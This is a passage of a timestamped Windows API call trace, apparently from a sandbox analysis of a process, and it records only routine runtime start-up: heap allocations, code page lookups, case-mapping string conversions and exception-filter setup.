RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x5e) returned 0x8323a0 [0176.920] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xb4) returned 0x832408 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x48) returned 0x8324c8 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x54) returned 0x832518 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x5a) returned 0x832578 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x6c) returned 0x8325e0 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x76) returned 0x832658 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x60) returned 0x8326d8 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xf6) returned 0x832740 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x52) returned 0x832840 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x42) returned 0x8328a0 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x50) returned 0x8328f0 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x78) returned 0x832948 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x76) returned 0x8329c8 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x48) returned 0x832a48 [0176.921] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x66) returned 0x832a98 [0176.922] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x50) returned 0x832b08 [0176.922] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x68) returned 0x832b60 [0176.922] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x48) returned 0x832bd0 [0176.922] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x831018) returned 1 [0176.922] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x831018 | out: hHeap=0x830000) returned 1 [0176.923] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0xa4) returned 0x832c20 [0176.923] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x824) returned 0x831018 [0176.923] GetLastError () returned 0x0 [0176.923] SetLastError (dwErrCode=0x0) [0176.923] GetLastError () returned 0x0 [0176.923] SetLastError (dwErrCode=0x0) [0176.923] GetLastError () returned 0x0 [0176.923] SetLastError (dwErrCode=0x0) [0176.923] GetACP () returned 0x4e4 [0176.923] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x244) returned 0x832cd0 [0176.923] GetLastError () returned 0x0 [0176.923] SetLastError (dwErrCode=0x0) [0176.923] IsValidCodePage (CodePage=0x4e4) returned 1 [0176.924] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe48 | out: lpCPInfo=0x19fe48) returned 1 [0176.924] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f90c | out: lpCPInfo=0x19f90c) returned 1 [0176.924] GetLastError () returned 0x0 [0176.924] SetLastError (dwErrCode=0x0) [0176.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.924] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x22c) returned 0x832f20 [0176.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x832f48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0176.924] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x19fc2c | out: lpCharType=0x19fc2c) returned 1 [0176.924] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x832f20) returned 1 [0176.924] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x832f20 | out: hHeap=0x830000) returned 1 [0176.924] GetLastError () returned 0x0 [0176.924] SetLastError (dwErrCode=0x0) [0176.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0176.924] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x22c) returned 0x832f20 [0176.924] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x832f48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0176.925] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0176.925] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x22c) returned 0x833158 [0176.925] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x833180, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0176.925] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fb2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0176.925] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x833158) returned 1 [0176.925] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x833158 | out: hHeap=0x830000) returned 1 [0177.236] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x832f20) returned 1 [0177.236] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x832f20 | out: hHeap=0x830000) returned 1 [0177.236] GetLastError () returned 0x0 [0177.236] SetLastError (dwErrCode=0x0) [0177.236] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0177.237] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x22c) returned 0x832f20 [0177.237] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x832f48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0177.237] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0177.237] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x22c) returned 0x833158 [0177.237] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x833180, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽") returned 256 [0177.237] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽", cchWideChar=256, lpMultiByteStr=0x19fa2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0177.237] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x833158) returned 1 [0177.237] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x833158 | out: hHeap=0x830000) returned 1 [0177.237] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x832f20) returned 1 [0177.237] HeapFree (in: hHeap=0x830000, dwFlags=0x0, lpMem=0x832f20 | out: hHeap=0x830000) returned 1 [0177.237] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0177.237] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0177.237] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x420760) returned 0x0 [0177.238] HeapValidate (hHeap=0x830000, dwFlags=0x0, lpMem=0x832c20) returned 1